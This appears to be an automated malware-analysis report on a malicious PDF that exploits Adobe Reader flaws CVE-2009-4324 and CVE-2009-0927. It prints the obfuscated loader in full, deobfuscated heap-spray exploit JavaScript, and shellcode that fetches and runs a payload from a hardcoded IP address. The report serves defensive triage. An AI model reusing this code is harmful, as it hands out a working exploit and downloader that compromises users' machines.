PDF malware analysis — malicious · dc3e3068ca9847a2

MALICIOUS

PDF

13.7 KB First seen: 2026-05-08

MD5: 4988ee96bb79deeb595c113348f7b0af SHA-1: 29d1acf15600bc028d21774628ab9c395519073e SHA-256: dc3e3068ca9847a27174cdce3a300e6055f36593eca591cbb4579fb90c0919d8

310 Risk Score

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 9

media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324

PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927

PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT

One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY

Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
JavaScript action low 2 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL

Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://91.228.133.56/dng290911/db1523498df7965a4ccd8abc43397f6d/d7.php?f=g Referenced by PDF JavaScript
- http://91.228.133.56/dng290911/db1523498df7965a4ccd8abc43397f6d/d8.php?f=nReferenced by PDF JavaScript

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`javascript_obj0076_000.js`	pdf-javascript-stream	PDF /JS object 76 at offset 0x38A	12918 bytes
SHA-256: `9620e10890f3cef74808f104f28cc9555d525978d6d25b02d095ef193da99b92`
Preview script First 1,000 lines of the extracted script a="C)S.9P4;{Fhf=c_a}\|>5,:l3Dom&e%@nbAs2x]E<p(w7V1Ng-d 0riu+6[v'IB8yt"; w=''; w+='sl'; w+='i'; w+="c"+a[28]; j='b343tb3g'; j=j[w]; z =new Array (58,15,52,50,14,45,25,12,59,29,54,62,23,56,56,29,54,9,0,38,6,29,54,62,19,9,0,29,54,43,19,38,6,29,54,38,4,23,6,29,54,23,23,19,9,29,54,56,6,0,51,29,54,6,51,62,61,29,54,62,61,23,51,29,54,51,0,6,51,29,54,43,51,62,61,29,54,19,56,45,0,29,54,43,56,62,61,29,54,23,23,51,62,29,54,56,56,24,61,29,54,19,38,62,61,29,54,51,23,23,0,29,54,23,23,43,6,29,54,62,45,35,0,29,54,45,19,38,38,29,54,9,9,45,51,29,54,61,62,9,9,29,54,6,51,62,61,29,54,0,23,23,51,29,54,23,4,6,56,29,54,43,19,51,56,29,54,62,43,9,61,29,54,35,6,23,6,29,54,38,6,62,19,29,54,19,45,43,19,29,54,38,61,38,4,29,54,19,45,6,0,29,54,62,61,19,56,29,54,23,0,43,19,29,54,43,6,62,61,29,54,43,62,23,19,29,54,9,19,51,23,29,54,62,61,19,56,29,54,35,51,43,56,29,54,9,19,51,23,29,54,0,4,23,23,29,54,6,45,6,4,29,54,33,24,9,0,29,54,0,19,51,23,29,54,24,61,23,23,29,54,61,38,51,9,29,54,23,62,45,51,29,54,43,6,9,35,29,54,0,45,51,62,29,54,51,24,0,61,29,54,24,33,51,23,29,54,38,61,6,51,29,54,23,61,9,45,29,54,43,19,45,9,29,54,19,38,38,56,29,54,19,38,62,61,29,54,51,23,35,6,29,54,56,56,24,24,29,54,51,0,62,61,29,54,62,24,6,61,29,54,38,0,6,56,29,54,19,6,9,9,29,54,51,0,35,6,29,54,24,62,62,61,29,54,24,24,51,23,29,54,51,6,62,61,29,54,51,23,62,61,29,54,33,61,0,19,29,54,19,4,19,38,29,54,38,61,0,23,29,54,33,24,19,23,29,54,56,62,62,61,29,54,62,51,35,51,29,54,51,0,43,24,29,54,43,6,23,23,29,54,4,56,51,23,29,54,9,23,38,61,29,54,56,62,62,61,29,54,62,61,51,62,29,54,56,33,9,43,29,54,19,4,51,19,29,54,4,62,38,62,29,54,9,9,9,9,29,54,38,35,9,9,29,54,38,62,9,4,29,54,51,51,51,51,29,54,51,51,51,51,29,54,19,51,19,62,29,54,6,51,56,33,29,54,9,9,56,62,29,54,51,51,51,51,29,54,19,51,51,51,29,54,0,51,62,23,29,54,19,51,45,4,29,54,62,61,19,19,29,54,62,61,38,0,29,54,45,51,19,38,29,54,0,23,62,23,29,54,9,9,51,19,29,54,56,62,38,23,29,54,56,38,56,9,29,54,51,51,51,51,29,54,43,19,56,62,29,54,56,0,43,35,29,54,19,6,56,24,29,54,45,56,9,9,29,54,0,6,62,23,29,54,62,61,51,62,29,54,38,62,38,62,29,54,9,9,56,45,29,54,9,9,9,9,29,54,51,35,38,61,29,54,43,35,38,61,29,54,38,0,62,45,29,54,51,45,51,6,29,54,51,51,51,51,29,54,19,0,62,24,29,54,51,0,35,6,29,54,51,6,0,43,29,54,43,35,35,6,29,54,56,43,56,19,29,54,0,43,43,23,29,54,35,6,6,6,29,54,43,56,51,6,29,54,23,23,43,35,29,54,0,43,23,35,29,54,35,6,6,6,29,54,35,51,51,62,29,54,43,23,35,24,29,54,19,23,35,51,29,54,9,62,56,62,29,54,51,51,51,51,29,54,9,9,51,51,29,54,51,0,19,56,29,54,38,62,62,61,29,54,0,4,23,23,29,54,0,43,19,45,29,54,45,24,6,6,29,54,43,43,51,51,29,54,56,35,43,51,29,54,0,43,43,6,29,54,45,24,6,6,29,54,35,38,51,19,29,54,56,0,56,6,29,54,0,56,56,0,29,54,45,24,6,6,29,54,51,51,51,4,29,54,62,33,19,4,29,54,51,6,0,45,29,54,62,62,23,51,29,54,45,24,6,6,29,54,6,45,51,6,29,54,56,33,19,45,29,54,56,33,51,51,29,54,19,23,51,51,29,54,56,33,19,43,29,54,9,9,51,51,29,54,45,6,19,56,29,54,0,51,62,19,29,54,45,56,43,19,29,54,51,51,56,33,29,54,9,9,19,23,29,54,51,6,19,56,29,54,51,51,56,33,29,54,38,61,62,23,29,54,19,23,51,0,29,54,19,56,9,9,29,54,62,23,51,6,29,54,51,0,0,23,29,54,51,35,38,61,29,54,45,23,38,61,29,54,62,51,6,43,29,54,51,51,23,9,29,54,9,33,43,19,29,54,62,51,6,43,29,54,51,51,23,9,29,54,0,6,43,19,29,54,51,51,56,33,29,54,9,38,56,33,29,54,19,56,9,9,29,54,38,62,51,62,29,54,9,38,4,0,29,54,9,9,9,9,29,54,6,38,62,38,29,54,38,0,51,38,29,54,9,38,4,62,29,54,51,38,62,33,29,54,56,9,62,4,29,54,61,24,51,45,29,54,0,33,23,23,29,54,19,61,62,33,29,54,0,56,45,61,29,54,43,4,6,56,29,54,45,33,23,56,29,54,43,51,35,9,29,54,43,6,56,62,29,54,43,51,43,6,29,54,35,9,23,33,29,54,23,4,35,9,29,54,35,38,23,45,29,54,23,35,23,35,29,54,35,38,23,62,29,54,23,23,23,45,29,54,35,38,23,23,29,54,23,56,23,19,29,54,56,6,35,9,29,54,56,43,56,38,29,54,23,4,23,35,29,54,23,4,23,51,29,54,23,45,23,45,29,54,56,6,35,9,29,54,23,45,56,35,29,54,23,35,23,19,29,54,23,6,23,23,29,54,23,62,23,4,29,54,56,56,56,6,29,54,23,4,23,43,29,54,23,19,23,56,29,54,23,6,56,45,29,54,56,23,56,23,29,54,23,62,56,6,29,54,56,35,56,45,29,54,23,6,56,23,29,54,23,23,23,23,29,54,23,43,23,4,29,54,23,56,56,56,29,54,35,9,56,6,29,54,23,43,56,6,29,54,43,51,35,38,29,54,43,51,56,62,29,54,56,56,23,9,29,54,56,43,23,24,29,54,51,51,51,51,59,7,58,15,52,50,14,35,25,12,59,29,54,62,23,56,56,29,54,9,0,38,6,29,54,62,19,9,0,29,54,43,19,38,6,29,54,38,4,23,6,29,54,23,23,19,9,29,54,56,6,0,51,29,54,6,51,62,61,29,54,62,61,23,51,29,54,51,0,6,51,29,54,43,51,62,61,29,54,19,56,45,0,29,54,43,56,62,61,29,54,23,23,51,62,29,54,56,56,24,61,29,54,19,38,62,61,29,54,51,23,23,0,29,54,23,23,43,6,29,54,62,45,35,0,29,54,45,19,38,38,29,54,9,9,45,51,29,54,61,62,9,9,29,54,6,51,62,61,29,54,0,23,23,51,29,54,23,4,6,56,29,54,43,19,51,56,29,54,62,43,9,61,29,54,35,6,23,6,29,54,38,6,62,19,29,54,19,45,43,19,29,54,38,61,38,4,29,54,19,45,6,0,29,54,62,61,19,56,29,54,23,0,43,19,29,54,43,6,62,61,29,54,43,62,23,19,29,54,9,19,51,23,29,54,62,61,19,56,29,54,35,51,43,56,29,54,9,19,51,23,29,54,0,4,23,23,29,54,6,45,6,4,29,54,33,24,9,0,29,54,0,19,51,23,29,54,24,61,23,23,29,54,61,38,51,9,29,54,23,62,45,51,29,54,43,6,9,35,29,54,0,45,51,62,29,54,51,24,0,61,29,54,24,33,51,23,29,54,38,61,6,51,29,54,23,61,9,45,29,54,43,19,45,9,29,54,19,38,38,56,29,54,19,38,62,61,29,54,51,23,35,6,29,54,56,56,24,24,29,54,51,0,62,61,29,54,62,24,6,61,29,54,38,0,6,56,29,54,19,6,9,9,29,54,51,0,35,6,29,54,24,62,62,61,29,54,24,24,51,23,29,54,51,6,62,61,29,54,51,23,62,61,29,54,33,61,0,19,29,54,19,4,19,38,29,54,38,61,0,23,29,54,33,24,19,23,29,54,56,62,62,61,29,54,62,51,35,51,29,54,51,0,43,24,29,54,43,6,23,23,29,54,4,56,51,23,29,54,9,23,38,61,29,54,56,62,62,61,29,54,62,61,51,62,29,54,56,33,9,43,29,54,19,4,51,19,29,54,4,62,38,62,29,54,9,9,9,9,29,54,38,35,9,9,29,54,38,62,9,4,29,54,51,51,51,51,29,54,51,51,51,51,29,54,19,51,19,62,29,54,6,51,56,33,29,54,9,9,56,62,29,54,51,51,51,51,29,54,19,51,51,51,29,54,0,51,62,23,29,54,19,51,45,4,29,54,62,61,19,19,29,54,62,61,38,0,29,54,45,51,19,38,29,54,0,23,62,23,29,54,9,9,51,19,29,54,56,62,38,23,29,54,56,38,56,9,29,54,51,51,51,51,29,54,43,19,56,62,29,54,56,0,43,35,29,54,19,6,56,24,29,54,45,56,9,9,29,54,0,6,62,23,29,54,62,61,51,62,29,54,38,62,38,62,29,54,9,9,56,45,29,54,9,9,9,9,29,54,51,35,38,61,29,54,43,35,38,61,29,54,38,0,62,45,29,54,51,45,51,6,29,54,51,51,51,51,29,54,19,0,62,24,29,54,51,0,35,6,29,54,51,6,0,43,29,54,43,35,35,6,29,54,56,43,56,19,29,54,0,43,43,23,29,54,35,6,6,6,29,54,43,56,51,6,29,54,23,23,43,35,29,54,0,43,23,35,29,54,35,6,6,6,29,54,35,51,51,62,29,54,43,23,35,24,29,54,19,23,35,51,29,54,9,62,56,62,29,54,51,51,51,51,29,54,9,9,51,51,29,54,51,0,19,56,29,54,38,62,62,61,29,54,0,4,23,23,29,54,0,43,19,45,29,54,45,24,6,6,29,54,43,43,51,51,29,54,56,35,43,51,29,54,0,43,43,6,29,54,45,24,6,6,29,54,35,38,51,19,29,54,56,0,56,6,29,54,0,56,56,0,29,54,45,24,6,6,29,54,51,51,51,4,29,54,62,33,19,4,29,54,51,6,0,45,29,54,62,62,23,51,29,54,45,24,6,6,29,54,6,45,51,6,29,54,56,33,19,45,29,54,56,33,51,51,29,54,19,23,51,51,29,54,56,33,19,43,29,54,9,9,51,51,29,54,45,6,19,56,29,54,0,51,62,19,29,54,45,56,43,19,29,54,51,51,56,33,29,54,9,9,19,23,29,54,51,6,19,56,29,54,51,51,56,33,29,54,38,61,62,23,29,54,19,23,51,0,29,54,19,56,9,9,29,54,62,23,51,6,29,54,51,0,0,23,29,54,51,35,38,61,29,54,45,23,38,61,29,54,62,51,6,43,29,54,51,51,23,9,29,54,9,33,43,19,29,54,62,51,6,43,29,54,51,51,23,9,29,54,0,6,43,19,29,54,51,51,56,33,29,54,9,38,56,33,29,54,19,56,9,9,29,54,38,62,51,62,29,54,9,38,4,0,29,54,9,9,9,9,29,54,6,38,62,38,29,54,38,0,51,38,29,54,9,38,4,62,29,54,51,38,62,33,29,54,56,9,62,4,29,54,61,24,51,45,29,54,0,33,23,23,29,54,19,61,62,33,29,54,0,56,45,61,29,54,43,4,6,56,29,54,45,33,23,56,29,54,43,51,35,9,29,54,43,6,56,62,29,54,43,51,43,6,29,54,35,9,23,33,29,54,23,4,35,9,29,54,35,38,23,45,29,54,23,35,23,35,29,54,35,38,23,62,29,54,23,23,23,45,29,54,35,38,23,23,29,54,23,56,23,19,29,54,56,6,35,9,29,54,56,43,56,38,29,54,23,4,23,35,29,54,23,4,23,51,29,54,23,45,23,45,29,54,56,6,35,9,29,54,23,45,56,35,29,54,23,35,23,19,29,54,23,6,23,23,29,54,23,62,23,4,29,54,56,56,56,6,29,54,23,4,23,43,29,54,23,19,23,56,29,54,23,6,56,45,29,54,56,23,56,23,29,54,23,62,56,6,29,54,56,35,56,45,29,54,23,6,56,23,29,54,23,23,23,23,29,54,23,43,23,4,29,54,23,56,56,56,29,54,35,9,56,6,29,54,23,62,56,6,29,54,43,51,35,38,29,54,43,51,56,62,29,54,56,56,23,9,29,54,56,38,23,24,29,54,51,51,51,51,59,7,11,54,31,13,64,53,25,31,50,14,23,25,41,1,8,58,15,52,50,14,6,25,12,15,40,40,3,58,53,28,42,28,52,44,28,52,34,53,25,31,3,64,25,2,64,52,53,31,47,41,1,7,14,6,25,12,14,6,25,3,52,28,40,22,15,13,28,41,59,3,59,20,59,59,1,7,42,10,53,22,28,41,14,6,25,3,22,28,31,47,64,10,39,6,1,8,14,6,25,55,12,59,51,59,7,16,14,6,25,12,40,15,52,34,28,60,31,64,41,14,6,25,20,45,51,1,7,52,28,64,54,52,31,50,14,6,25,7,16,11,54,31,13,64,53,25,31,50,14,19,25,41,1,8,11,54,31,13,64,53,25,31,50,14,56,25,41,1,8,58,15,52,50,14,43,25,12,59,40,30,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,50,21,50,63,63,63,63,45,45,45,59,7,54,64,53,22,3,40,52,53,31,64,49,41,14,43,25,20,31,28,42,50,24,15,64,28,41,1,1,7,16,58,15,52,50,14,62,25,12,45,35,51,51,51,7,14,4,25,12,31,28,42,50,33,52,52,15,63,41,1,7,58,15,52,50,14,45,25,51,12,59,29,54,4,51,4,51,29,54,4,51,4,51,59,7,58,15,52,50,14,45,25,45,12,14,35,25,7,14,45,25,51,12,54,31,28,34,13,15,40,28,41,14,45,25,51,1,7,14,45,25,45,12,54,31,28,34,13,15,40,28,41,14,45,25,45,1,7,42,10,53,22,28,41,14,45,25,51,3,22,28,31,47,64,10,39,12,51,36,62,51,51,51,1,8,14,45,25,51,55,12,14,45,25,51,7,16,14,45,25,51,12,14,45,25,51,3,34,54,32,34,64,52,41,51,20,51,36,62,51,51,51,48,14,45,25,45,3,22,28,31,47,64,10,1,7,50,11,25,52,41,14,45,25,35,12,51,7,14,45,25,35,39,14,62,25,7,14,45,25,35,55,55,1,8,14,4,25,57,14,45,25,35,37,12,14,45,25,51,55,14,45,25,45,7,16,53,11,41,14,62,25,1,8,14,56,25,41,1,7,14,56,25,41,1,7,64,52,63,8,64,10,53,34,3,26,28,49,53,15,3,31,28,42,5,22,15,63,28,52,41,31,54,22,22,1,7,16,13,15,64,13,10,41,28,1,8,16,14,56,25,41,1,7,16,16,11,54,31,13,64,53,25,31,50,14,45,25,23,41,1,8,58,15,52,50,14,45,25,6,12,54,31,28,34,13,15,40,28,41,14,45,25,1,7,14,45,25,19,12,54,31,28,34,13,15,40,28,41,59,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,29,54,4,51,4,51,59,1,55,14,45,25,6,7,14,45,25,56,12,54,31,28,34,13,15,40,28,41,59,29,54,4,51,4,51,29,54,4,51,4,51,59,1,7,14,45,25,43,12,45,51,7,14,45,25,62,12,14,45,25,43,55,14,45,25,19,3,22,28,31,47,64,10,7,42,10,53,22,28,41,14,45,25,56,3,22,28,31,47,64,10,39,14,45,25,62,1,14,45,25,56,55,12,14,45,25,56,7,14,45,25,4,12,14,45,25,56,3,34,54,32,34,64,52,53,31,47,41,51,20,14,45,25,62,1,7,14,35,25,35,12,14,45,25,56,3,34,54,32,34,64,52,53,31,47,41,51,20,14,45,25,56,3,22,28,31,47,64,10,48,14,45,25,62,1,7,42,10,53,22,28,41,14,35,25,35,3,22,28,31,47,64,10,55,14,45,25,62,39,51,36,6,51,51,51,51,1,14,35,25,35,12,14,35,25,35,55,14,35,25,35,55,14,45,25,4,7,14,35,25,51,12,31,28,42,50,33,52,52,15,63,41,1,7,11,25,52,41,14,35,25,45,12,51,7,14,35,25,45,39,45,62,51,7,14,35,25,45,55,55,1,14,35,25,51,57,14,35,25,45,37,12,14,35,25,35,55,14,45,25,19,7,58,15,52,50,14,35,25,23,12,6,51,45,35,7,58,15,52,50,14,35,25,6,12,33,52,52,15,63,41,14,35,25,23,1,7,11,25,52,41,14,35,25,45,12,51,7,14,35,25,45,39,14,35,25,23,7,14,35,25,45,55,55,1,8,14,35,25,6,57,14,35,25,45,37,12,54,31,28,34,13,15,40,28,41,59,29,51,15,29,51,15,29,51,15,29,51,15,59,1,7,16,0,25,22,22,15,32,3,47,28,64,60,13,25,31,41,14,35,25,6,55,59,14,46,3,32,54,31,49,22,28,59,1,7,16,58,15,52,50,14,6,25,12,14,23,25,41,1,7,53,11,41,41,41,14,6,25,18,62,4,19,51,1,27,27,41,14,6,25,39,4,51,19,51,1,1,17,17,41,41,14,6,25,18,12,62,51,51,51,1,27,27,41,14,6,25,39,12,62,45,51,35,1,1,1,8,14,45,25,23,41,1,7,16,28,22,34,28,50,53,11,41,41,14,6,25,18,12,4,45,51,51,1,17,17,41,14,6,25,39,12,4,35,51,51,1,17,17,41,14,6,25,18,12,62,45,51,23,1,17,17,41,14,6,25,39,12,62,45,51,43,1,1,8,14,19,25,41,1,7,16); s=''; b = 'al'; b2 =a[28] + a[58]+b;for (i=0;i<z.length;i++) {s+=a[z[i]]} e=(j()); e=e[b2]; e(s);
`generic_stage_recovery_000.js`	deobfuscated-js	generic stage recovery alphabet-index-array from JavaScript object 76 at offset 0x38A	4469 bytes
SHA-256: `3635ce3d4a495b9dcc1ba7c03f6ba31653c2be2d262c647cbfb0d59269b27002`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 6 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script var _1o='%u8366%uFCE4%u85FC%u75E4%uE934%u335F%u64C0%u408B%u8B30%u0C40%u708B%u561C%u768B%u3308%u66DB%u5E8B%u033C%u3374%u812C%u15EE%uFF10%uB8FF%u408B%uC330%u3946%u7506%u87FB%u2434%uE485%u5175%uEBE9%u514C%u8B56%u3C75%u748B%u7835%uF503%u8B56%u2076%uF503%uC933%u4149%uADFC%uC503%uDB33%uBE0F%u3810%u74F2%uC108%u0DCB%uDA03%uEB40%u3BF1%u751F%u5EE6%u5E8B%u0324%u66DD%u0C8B%u8D4B%uEC46%u54FF%u0C24%uD88B%uDD03%u048B%u038B%uABC5%u595E%uEBC3%uAD53%u688B%u8020%u0C7D%u7433%u9603%uF3EB%u688B%u8B08%u6AF7%u5905%u98E8%uFFFF%uE2FF%uE8F9%u0000%u0000%u5058%u406A%uFF68%u0000%u5000%uC083%u5019%u8B55%u8BEC%u105E%uC383%uFF05%u68E3%u6E6F%u0000%u7568%u6C72%u546D%u16FF%uC483%u8B08%uE8E8%uFF61%uFFFF%u02EB%u72EB%uEC81%u0104%u0000%u5C8D%u0C24%u04C7%u7224%u6765%uC773%u2444%u7604%u3372%uC732%u2444%u2008%u732D%u5320%uF868%u0000%uFF00%u0C56%uE88B%uC933%uC751%u1D44%u7700%u6270%uC774%u1D44%u2E05%u6C64%uC66C%u1D44%u0009%u8A59%u04C1%u8830%u1D44%u4104%u6A51%u6A00%u5300%u6A57%uFF00%u1456%uC085%u1675%u006A%uFF53%u0456%u006A%uEB83%u530C%u56FF%u8304%u0CC3%u02EB%u13EB%u8047%u003F%uFA75%u8047%u003F%uC475%u006A%uFE6A%u56FF%uE808%uFE9C%uFFFF%u4E8E%uEC0E%uFE98%u0E8A%u6F89%uBD01%uCA33%u5B8A%uC61B%u7946%u1A36%u702F%u7468%u7074%u2F3A%u392F%u2E31%u3232%u2E38%u3331%u2E33%u3635%u642F%u676E%u3932%u3930%u3131%u642F%u3162%u3235%u3433%u3839%u6664%u3937%u3536%u3461%u6363%u3864%u6261%u3463%u3333%u3739%u3666%u2F64%u3764%u702E%u7068%u663F%u673D%u0000';var _2o='%u8366%uFCE4%u85FC%u75E4%uE934%u335F%u64C0%u408B%u8B30%u0C40%u708B%u561C%u768B%u3308%u66DB%u5E8B%u033C%u3374%u812C%u15EE%uFF10%uB8FF%u408B%uC330%u3946%u7506%u87FB%u2434%uE485%u5175%uEBE9%u514C%u8B56%u3C75%u748B%u7835%uF503%u8B56%u2076%uF503%uC933%u4149%uADFC%uC503%uDB33%uBE0F%u3810%u74F2%uC108%u0DCB%uDA03%uEB40%u3BF1%u751F%u5EE6%u5E8B%u0324%u66DD%u0C8B%u8D4B%uEC46%u54FF%u0C24%uD88B%uDD03%u048B%u038B%uABC5%u595E%uEBC3%uAD53%u688B%u8020%u0C7D%u7433%u9603%uF3EB%u688B%u8B08%u6AF7%u5905%u98E8%uFFFF%uE2FF%uE8F9%u0000%u0000%u5058%u406A%uFF68%u0000%u5000%uC083%u5019%u8B55%u8BEC%u105E%uC383%uFF05%u68E3%u6E6F%u0000%u7568%u6C72%u546D%u16FF%uC483%u8B08%uE8E8%uFF61%uFFFF%u02EB%u72EB%uEC81%u0104%u0000%u5C8D%u0C24%u04C7%u7224%u6765%uC773%u2444%u7604%u3372%uC732%u2444%u2008%u732D%u5320%uF868%u0000%uFF00%u0C56%uE88B%uC933%uC751%u1D44%u7700%u6270%uC774%u1D44%u2E05%u6C64%uC66C%u1D44%u0009%u8A59%u04C1%u8830%u1D44%u4104%u6A51%u6A00%u5300%u6A57%uFF00%u1456%uC085%u1675%u006A%uFF53%u0456%u006A%uEB83%u530C%u56FF%u8304%u0CC3%u02EB%u13EB%u8047%u003F%uFA75%u8047%u003F%uC475%u006A%uFE6A%u56FF%uE808%uFE9C%uFFFF%u4E8E%uEC0E%uFE98%u0E8A%u6F89%uBD01%uCA33%u5B8A%uC61B%u7946%u1A36%u702F%u7468%u7074%u2F3A%u392F%u2E31%u3232%u2E38%u3331%u2E33%u3635%u642F%u676E%u3932%u3930%u3131%u642F%u3162%u3235%u3433%u3839%u6664%u3937%u3536%u3461%u6363%u3864%u6261%u3463%u3333%u3739%u3666%u2F64%u3864%u702E%u7068%u663F%u6E3D%u0000';function _3o(){var _4o=app.viewerVersion.toString();_4o=_4o.replace('.','');while(_4o.length<4){_4o+='0';}_4o=parseInt(_4o,10);return _4o;}function _5o(){function _6o(){var _7o='p@111111111111111111111111 : yyyy111';util.printd(_7o,new Date());}var _8o=12000;_9o=new Array();var _1o0='%u9090%u9090';var _1o1=_2o;_1o0=unescape(_1o0);_1o1=unescape(_1o1);while(_1o0.length<=0x8000){_1o0+=_1o0;}_1o0=_1o0.substr(0,0x8000-_1o1.length); for(_1o2=0;_1o2<_8o;_1o2++){_9o[_1o2]=_1o0+_1o1;}if(_8o){_6o();_6o();try{this.media.newPlayer(null);}catch(e){}_6o();}}function _1o3(){var _1o4=unescape(_1o);_1o5=unescape('%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090')+_1o4;_1o6=unescape('%u9090%u9090');_1o7=10;_1o8=_1o7+_1o5.length;while(_1o6.length<_1o8)_1o6+=_1o6;_1o9=_1o6.substring(0,_1o8);_2o2=_1o6.substring(0,_1o6.length-_1o8);while(_2o2.length+_1o8<0x40000)_2o2=_2o2+_2o2+_1o9;_2o0=new Array();for(_2o1=0;_2o1<180;_2o1++)_2o0[_2o1]=_2o2+_1o5;var _2o3=4012;var _2o4=Array(_2o3);for(_2o1=0;_2o1<_2o3;_2o1++){_2o4[_2o1]=unescape('%0a%0a%0a%0a');}Collab.getIcon(_2o4+'_N.bundle');}var _4o=_3o();if(((_4o>8950)&&(_4o<9050))\|\|((_4o>=8000)&&(_4o<=8102))){_1o3();}else if((_4o>=9100)\|\|(_4o<=9200)\|\|(_4o>=8103)\|\|(_4o<=8107)){_5o();}
`generic_stage_recovery_001.js`	deobfuscated-js	generic stage recovery percent-decode from JavaScript object 76 at offset 0x38A	4461 bytes
SHA-256: `eaf167ee186b02b8eb5dfd37cf0efb79c48d4a98e0b69649137bbdd4f0132b18`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 6 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script var _1o='%u8366%uFCE4%u85FC%u75E4%uE934%u335F%u64C0%u408B%u8B30%u0C40%u708B%u561C%u768B%u3308%u66DB%u5E8B%u033C%u3374%u812C%u15EE%uFF10%uB8FF%u408B%uC330%u3946%u7506%u87FB%u2434%uE485%u5175%uEBE9%u514C%u8B56%u3C75%u748B%u7835%uF503%u8B56%u2076%uF503%uC933%u4149%uADFC%uC503%uDB33%uBE0F%u3810%u74F2%uC108%u0DCB%uDA03%uEB40%u3BF1%u751F%u5EE6%u5E8B%u0324%u66DD%u0C8B%u8D4B%uEC46%u54FF%u0C24%uD88B%uDD03%u048B%u038B%uABC5%u595E%uEBC3%uAD53%u688B%u8020%u0C7D%u7433%u9603%uF3EB%u688B%u8B08%u6AF7%u5905%u98E8%uFFFF%uE2FF%uE8F9%u0000%u0000%u5058%u406A%uFF68%u0000%u5000%uC083%u5019%u8B55%u8BEC%u105E%uC383%uFF05%u68E3%u6E6F%u0000%u7568%u6C72%u546D%u16FF%uC483%u8B08%uE8E8%uFF61%uFFFF%u02EB%u72EB%uEC81%u0104%u0000%u5C8D%u0C24%u04C